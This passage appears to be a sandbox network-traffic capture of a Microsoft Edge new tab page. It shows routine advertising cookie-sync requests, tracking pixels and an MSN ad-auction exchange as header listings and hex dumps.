                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:33 UTC43INData Raw: 47 49 46 38 37 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 04 0a 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                  Data Ascii: GIF87a!,L;
                                                                                                                                                                  2025-01-11 06:54:33 UTC16INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                  Data Ascii:


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  24192.168.11.2062695104.19.129.76443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC670OUTGET /m?cdsp=516415&c=0136911D054E6BFC0E90846C04216AB7&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: cm.mgid.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC347INHTTP/1.1 400 Bad Request
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                  Content-Length: 11
                                                                                                                                                                  Connection: close
                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                  X-Robots-Tag: noindex
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9002ff0428621cf4-ORD
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  2025-01-11 06:54:33 UTC11INData Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                  Data Ascii: Bad Request


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  25192.168.11.206188034.235.241.123443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC612OUTGET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: pr-bh.ybp.yahoo.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 0
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                  Server: ATS
                                                                                                                                                                  Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                  Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                  Set-Cookie: A3=d=AQABBKkVgmcCEDDSGKjjP3ShlIgwDBTXDL0FEgEBAQFng2eLZwAAAAAA_eMAAA&S=AQAAAvHEGzBf9lmp4FltzGdJ_To; Expires=Sun, 11 Jan 2026 12:54:33 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                  2025-01-11 06:54:33 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 cc cc cc ff ff ff 21 f9 04 05 14 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  26192.168.11.205195052.223.22.214443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC649OUTGET /mapuid?suid=0136911D054E6BFC0E90846C04216AB7&sid=16&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: eb2.3lift.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:33 UTC636INHTTP/1.1 302 Found
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:33 GMT
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Location: /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=
                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                  Set-Cookie: tluidp=46762353744943238752; Path=/; Domain=.3lift.com; Max-Age=7776000; Expires=Fri, 11 Apr 2025 06:54:33 GMT; Secure; SameSite=None; Partitioned;
                                                                                                                                                                  P3P: policyref="http://cdn.3lift.com/w3c/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
                                                                                                                                                                  set-cookie: tluid=46762353744943238752; Max-Age=7776000; Expires=Fri, 11 Apr 2025 06:54:33 GMT; Path=/; Domain=.3lift.com; Secure; SameSite=None


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  27192.168.11.206329735.245.40.102443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC719OUTGET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=0136911D054E6BFC0E90846C04216AB7&external=true&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: visitor.omnitagjs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                  Content-Length: 49
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                  Expires: 0
                                                                                                                                                                  P3p: CP="CAO PSA OUR"
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Set-Cookie: ayl_visitor=d1136e668cc91aa4e648815adb3feb55; Path=/; Domain=omnitagjs.com; Max-Age=2592000; Secure; SameSite=None
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  X-Kong-Upstream-Latency: 146
                                                                                                                                                                  X-Kong-Proxy-Latency: 0
                                                                                                                                                                  Via: kong/3.6.1
                                                                                                                                                                  X-Kong-Request-Id: 5c5b5e49e79ce47e20e0fa2d31c17747
                                                                                                                                                                  2025-01-11 06:54:34 UTC49INData Raw: 47 49 46 38 39 61 01 00 01 00 91 00 00 ff ff ff ff ff ff fe 01 02 00 00 00 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  28192.168.11.2049210204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:33 UTC3710OUTPOST /auction HTTP/1.1
                                                                                                                                                                  Host: srtb.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 3001
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  X-MSEdge-ClientID: 0136911D054E6BFC0E90846C04216AB7
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  x-ms-flightId: msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,ads-cfv4,1s-pnpfedloccf,pnpwxexpire360,bing_v2_scope,prg-1sw-sacfx2tc,prg-1sw-sa-capconf3t4,prg-1sw-sa-sp7-tcc,prg-1sw-rpdlaunch-5,prg-fin-cleftra,routefinanceprod,routergraphprod,prg-adspeek,prg-1sw-header-event,prg-pr2-widget-tab,f-rel-all,1s-fcrypt,1s-ntf1-pacerscale1,1s-ntf1-pacercand,1s-wpo-dmsdpr2,1s-wpo-pr2-dmsd,prg-1sw-dmpren,prg-1sw-sdcdp2,1s-ntf2-evlcfc,1s-ntf2-bknlc,1s-ntf2-iptlc,1s-pr2-evlc,1s-pr2-evlcbb,1s-pr2-evlch,1s-pr2-evlcn,1s-pr2-evlcrp,1s-pr2-evlct,1s-prg2-lifecycle,1s-wpo-pr2-ncard,1s-wpo-pr2-pnpfilter,1s-wpo-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_c,prg-cgp2-hott2,1s-cg-p2hot3,prg-1sw-dailypop,prg-1sw-trigdw,prg-pr2-trends-t1,1s-p2-lsawidget-c,1s-wpo-pr1-r1infpctl,cptest-msn-muid-c,1s-notifmapping,1s-shp-rc-te-combo1,1s-shp [TRUNCATED]
                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                  X-MSEdge-Market: en-us
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  X-ms-numberline: moneyhz3=ads-cfv4,5qos=ads-nopostsq-t,5sov=ads-usepme,5ui9=ads-anjson-migt,63hy=ads-nooutbrain,649x=ads-prcrid-bi,66ky=ads-fbk-gserver,6965=ads-bcn-cndomain
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:33 UTC3001OUTData Raw: 7b 22 61 64 52 65 66 72 65 73 68 56 61 72 69 61 6e 74 22 3a 22 22 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 75 73 22 2c 22 72 69 64 22 3a 22 66 37 62 36 36 65 30 66 39 39 37 37 34 65 65 34 39 39 34 61 39 35 37 32 64 31 33 33 61 33 63 39 22 2c 22 70 61 72 74 6e 65 72 49 64 22 3a 22 64 68 70 22 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 73 6f 75 72 63 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 65 64 67 65 2f 64 68 70 22 2c 22 70 61 67 65 54 79 70 65 22 3a 22 65 64 67 65 63 68 72 6e 74 70 22 2c 22 70 72 65 76 69 6f 75 73 52 65 73 65 72 76 65 64 52 69 76 65 72 4e 61 74 69 76 65 41 64 43 6f 75 6e 74 22 3a 30 2c 22 70 72 65 76 69 6f 75 73 52 69 76 65 72 44 75 61 6c 57 69 64 65 4e 61 74 69 76 65 41 64 43 6f 75 6e 74 22 3a 30 2c
                                                                                                                                                                  Data Ascii: {"adRefreshVariant":"","locale":"en-us","rid":"f7b66e0f99774ee4994a9572d133a3c9","partnerId":"dhp","content":{"sourceUrl":"https://ntp.msn.com/edge/dhp","pageType":"edgechrntp","previousReservedRiverNativeAdCount":0,"previousRiverDualWideNativeAdCount":0,
                                                                                                                                                                  2025-01-11 06:54:34 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                  Vary: Origin
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Server-Timing: total;dur=179
                                                                                                                                                                  Timing-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 09655EAD21FD4F43B90A860338922B3F Ref B: CHI30EDGE0319 Ref C: 2025-01-11T06:54:33Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:34 UTC3674INData Raw: 65 35 33 0d 0a 7b 22 70 6c 61 63 65 6d 65 6e 74 73 22 3a 5b 7b 22 61 75 63 74 69 6f 6e 49 64 22 3a 22 64 66 61 36 34 62 30 31 2d 65 63 35 34 2d 34 31 31 64 2d 39 37 62 35 2d 37 36 64 30 30 35 32 37 31 63 30 37 22 2c 22 72 65 67 69 6f 6e 22 3a 22 69 6e 66 6f 70 61 6e 65 22 2c 22 69 6e 64 65 78 22 3a 33 2c 22 70 72 6f 76 69 64 65 72 49 64 22 3a 22 62 69 6e 67 22 2c 22 73 75 62 50 72 6f 76 69 64 65 72 49 64 22 3a 22 6e 61 65 78 63 68 61 6e 67 65 22 2c 22 61 64 54 79 70 65 22 3a 22 41 75 63 74 69 6f 6e 22 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 75 73 22 2c 22 6d 6f 64 75 6c 65 54 61 67 22 3a 22 62 69 6e 67 73 70 6f 6e 63 6f 6e 22 2c 22 76 69 73 69 62 69 6c 69 74 79 55 72 6c 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 61 70
                                                                                                                                                                  Data Ascii: e53{"placements":[{"auctionId":"dfa64b01-ec54-411d-97b5-76d005271c07","region":"infopane","index":3,"providerId":"bing","subProviderId":"naexchange","adType":"Auction","locale":"en-us","moduleTag":"bingsponcon","visibilityUrls":["https://www.bing.com/ap
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 6f 66 74 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2f 61 64 2d 73 65 74 74 69 6e 67 73 22 2c 22 61 64 53 65 6c 65 63 74 69 6f 6e 52 65 61 73 6f 6e 22 3a 22 7b 5c 22 61 64 76 65 72 74 69 73 69 6e 67 50 6c 61 74 66 6f 72 6d 5c 22 3a 7b 5c 22 69 64 54 79 70 65 5c 22 3a 5c 22 49 41 42 5f 47 56 4c 5f 49 44 5c 22 2c 5c 22 69 64 5c 22 3a 31 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4d 69 63 72 6f 73 6f 66 74 5c 22 7d 2c 5c 22 74 61 72 67 65 74 69 6e 67 43 61 74 65 67 6f 72 79 5c 22 3a 7b 5c 22 67 65 6f 4c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 4e 4f 54 5f 55 53 45 44 5c 22 2c 5c 22 72 65 6d 61 72 6b 65 74 69 6e 67 5c 22 3a 5c 22 4e 4f 54 5f 55 53 45 44 5c 22 2c 5c 22 75 73 65 72 43 68 61 72 61 63 74 65 72 69 73 74 69 63 73 5c 22 3a 5b 5d 2c 5c 22 75 73 65 72
                                                                                                                                                                  Data Ascii: 2000oft.com/privacy/ad-settings","adSelectionReason":"{\"advertisingPlatform\":{\"idType\":\"IAB_GVL_ID\",\"id\":1,\"name\":\"Microsoft\"},\"targetingCategory\":{\"geoLocation\":\"NOT_USED\",\"remarketing\":\"NOT_USED\",\"userCharacteristics\":[],\"user
                                                                                                                                                                  2025-01-11 06:54:34 UTC4082INData Raw: 66 65 62 0d 0a 72 6c 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 73 72 74 62 2e 6d 73 6e 2e 63 6f 6d 3a 34 34 33 2f 6e 6f 74 69 66 79 2f 63 6c 69 63 6b 65 64 3f 72 69 64 3d 66 37 62 36 36 65 30 66 39 39 37 37 34 65 65 34 39 39 34 61 39 35 37 32 64 31 33 33 61 33 63 39 26 72 3d 72 69 76 65 72 26 69 3d 31 26 70 3d 65 64 67 65 63 68 72 6e 74 70 26 6c 3d 65 6e 2d 75 73 26 64 3d 62 69 6e 67 26 62 3d 45 64 67 26 61 3d 31 33 65 34 39 30 33 33 2d 36 34 33 63 2d 34 34 38 62 2d 39 63 30 36 2d 31 62 65 61 33 33 32 66 61 62 62 65 26 69 69 3d 31 26 63 3d 31 31 38 39 31 36 30 30 35 39 31 39 39 38 36 30 37 36 37 30 26 62 69 64 3d 34 36 31 32 64 31 39 31 2d 64 35 30 66 2d 34 38 35 38 2d 62 33 35 35 2d 62 39 33 34 30 65 39 31 66 33 66 64 26 74 69 64 3d 65 64 67 65 63 68 72 6e
                                                                                                                                                                  Data Ascii: febrls":["https://srtb.msn.com:443/notify/clicked?rid=f7b66e0f99774ee4994a9572d133a3c9&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrn
                                                                                                                                                                  2025-01-11 06:54:34 UTC487INData Raw: 31 65 30 0d 0a 67 26 61 3d 31 33 65 34 39 30 33 33 2d 36 34 33 63 2d 34 34 38 62 2d 39 63 30 36 2d 31 62 65 61 33 33 32 66 61 62 62 65 26 69 69 3d 31 26 63 3d 31 31 38 39 31 36 30 30 35 39 31 39 39 38 36 30 37 36 37 30 26 62 69 64 3d 34 36 31 32 64 31 39 31 2d 64 35 30 66 2d 34 38 35 38 2d 62 33 35 35 2d 62 39 33 34 30 65 39 31 66 33 66 64 26 74 69 64 3d 65 64 67 65 63 68 72 6e 74 70 2d 72 69 76 65 72 2d 31 26 70 74 69 64 3d 65 64 67 65 63 68 72 6e 74 70 2d 70 65 65 6b 72 69 76 65 72 2d 31 5c 22 5d 2c 5c 22 74 6a 62 5c 22 3a 5b 5d 2c 5c 22 62 65 61 63 6f 6e 53 74 61 74 75 73 55 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 73 72 74 62 2e 6d 73 6e 2e 63 6f 6d 3a 34 34 33 2f 6e 6f 74 69 66 79 2f 62 65 61 63 6f 6e 73 74 61 74 75 73 3f 72 69 64 3d 66 37 62 36
                                                                                                                                                                  Data Ascii: 1e0g&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1\"],\"tjb\":[],\"beaconStatusUrl\":\"https://srtb.msn.com:443/notify/beaconstatus?rid=f7b6
                                                                                                                                                                  2025-01-11 06:54:34 UTC4047INData Raw: 66 63 38 0d 0a 72 2d 31 5c 22 2c 5c 22 70 5c 22 3a 5c 22 62 69 6e 67 5c 22 2c 5c 22 65 5c 22 3a 74 72 75 65 7d 22 2c 22 61 64 46 65 65 64 62 61 63 6b 44 61 74 61 22 3a 22 7b 5c 22 61 64 50 72 6f 76 69 64 65 72 5c 22 3a 5c 22 62 69 6e 67 5c 22 2c 5c 22 61 64 54 69 74 6c 65 5c 22 3a 5c 22 50 72 69 63 65 20 44 72 6f 70 20 41 6c 65 72 74 5c 22 2c 5c 22 63 72 65 61 74 69 76 65 49 64 5c 22 3a 5c 22 55 32 56 68 63 6d 4e 6f 51 57 51 6a 4f 44 49 79 4e 54 63 32 4d 44 41 79 4e 6a 67 31 4e 54 6b 6a 4d 6a 4d 7a 4e 44 41 31 4e 7a 41 79 4f 44 45 33 4e 7a 45 7a 4d 41 3d 3d 5c 22 2c 5c 22 6c 6f 63 61 6c 65 5c 22 3a 5c 22 65 6e 2d 75 73 5c 22 2c 5c 22 70 6c 61 63 65 6d 65 6e 74 4c 69 6e 65 61 67 65 5c 22 3a 5c 22 65 78 74 63 6f 6e 74 65 6e 74 73 70 6f 6e 63 6f 6e 5f 65 64
                                                                                                                                                                  Data Ascii: fc8r-1\",\"p\":\"bing\",\"e\":true}","adFeedbackData":"{\"adProvider\":\"bing\",\"adTitle\":\"Price Drop Alert\",\"creativeId\":\"U2VhcmNoQWQjODIyNTc2MDAyNjg1NTkjMjMzNDA1NzAyODE3NzEzMA==\",\"locale\":\"en-us\",\"placementLineage\":\"extcontentsponcon_ed
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 2f 61 64 2d 73 65 74 74 69 6e 67 73 22 2c 22 61 64 53 65 6c 65 63 74 69 6f 6e 52 65 61 73 6f 6e 22 3a 22 7b 5c 22 61 64 76 65 72 74 69 73 69 6e 67 50 6c 61 74 66 6f 72 6d 5c 22 3a 7b 5c 22 69 64 54 79 70 65 5c 22 3a 5c 22 49 41 42 5f 47 56 4c 5f 49 44 5c 22 2c 5c 22 69 64 5c 22 3a 31 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4d 69 63 72 6f 73 6f 66 74 5c 22 7d 2c 5c 22 74 61 72 67 65 74 69 6e 67 43 61 74 65 67 6f 72 79 5c 22 3a 7b 5c 22 67 65 6f 4c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 4e 4f 54 5f 55 53 45 44 5c 22 2c 5c 22 72 65 6d 61 72 6b 65 74 69 6e 67 5c 22 3a 5c 22 4e 4f 54 5f 55 53 45 44 5c 22 2c 5c 22 75 73 65 72 43 68 61 72 61 63 74 65 72 69 73 74 69 63 73 5c 22 3a 5b 5c 22 41 47 45 5f 47 52 4f 55 50 5c 22 5d 2c 5c 22 75 73 65 72 49 6e
                                                                                                                                                                  Data Ascii: 2000/ad-settings","adSelectionReason":"{\"advertisingPlatform\":{\"idType\":\"IAB_GVL_ID\",\"id\":1,\"name\":\"Microsoft\"},\"targetingCategory\":{\"geoLocation\":\"NOT_USED\",\"remarketing\":\"NOT_USED\",\"userCharacteristics\":[\"AGE_GROUP\"],\"userIn
                                                                                                                                                                  2025-01-11 06:54:34 UTC4154INData Raw: 31 30 33 32 0d 0a 64 35 30 66 2d 34 38 35 38 2d 62 33 35 35 2d 62 39 33 34 30 65 39 31 66 33 66 64 26 74 69 64 3d 65 64 67 65 63 68 72 6e 74 70 2d 69 6e 66 6f 70 61 6e 65 2d 31 31 26 70 74 69 64 3d 65 64 67 65 63 68 72 6e 74 70 2d 70 65 65 6b 49 6e 66 6f 70 61 6e 65 2d 32 22 5d 2c 22 61 64 43 68 6f 69 63 65 73 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 72 69 76 61 63 79 2f 61 64 2d 73 65 74 74 69 6e 67 73 22 2c 22 61 64 53 65 6c 65 63 74 69 6f 6e 52 65 61 73 6f 6e 22 3a 22 7b 5c 22 61 64 76 65 72 74 69 73 69 6e 67 50 6c 61 74 66 6f 72 6d 5c 22 3a 7b 5c 22 69 64 54 79 70 65 5c 22 3a 5c 22 49 41 42 5f 47 56 4c 5f 49 44 5c 22 2c 5c 22 69 64 5c 22 3a 31 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4d
                                                                                                                                                                  Data Ascii: 1032d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2"],"adChoicesUrl":"https://account.microsoft.com/privacy/ad-settings","adSelectionReason":"{\"advertisingPlatform\":{\"idType\":\"IAB_GVL_ID\",\"id\":1,\"name\":\"M
                                                                                                                                                                  2025-01-11 06:54:34 UTC11INData Raw: 36 0d 0a 2f 6e 6f 74 69 66 0d 0a
                                                                                                                                                                  Data Ascii: 6/notif
                                                                                                                                                                  2025-01-11 06:54:34 UTC714INData Raw: 32 63 33 0d 0a 79 2f 62 65 61 63 6f 6e 73 74 61 74 75 73 3f 72 69 64 3d 66 37 62 36 36 65 30 66 39 39 37 37 34 65 65 34 39 39 34 61 39 35 37 32 64 31 33 33 61 33 63 39 26 72 3d 69 6e 66 6f 70 61 6e 65 26 69 3d 31 31 26 70 3d 65 64 67 65 63 68 72 6e 74 70 26 6c 3d 65 6e 2d 75 73 26 64 3d 62 69 6e 67 26 62 3d 45 64 67 26 61 3d 31 64 64 31 39 65 62 31 2d 37 33 35 62 2d 34 37 30 66 2d 39 32 30 39 2d 64 39 62 62 34 33 36 32 36 39 61 34 26 69 69 3d 31 26 63 3d 37 36 34 35 32 34 31 32 32 38 33 38 31 34 34 34 33 37 32 26 62 69 64 3d 34 36 31 32 64 31 39 31 2d 64 35 30 66 2d 34 38 35 38 2d 62 33 35 35 2d 62 39 33 34 30 65 39 31 66 33 66 64 26 74 69 64 3d 65 64 67 65 63 68 72 6e 74 70 2d 69 6e 66 6f 70 61 6e 65 2d 31 31 26 70 74 69 64 3d 65 64 67 65 63 68 72 6e 74
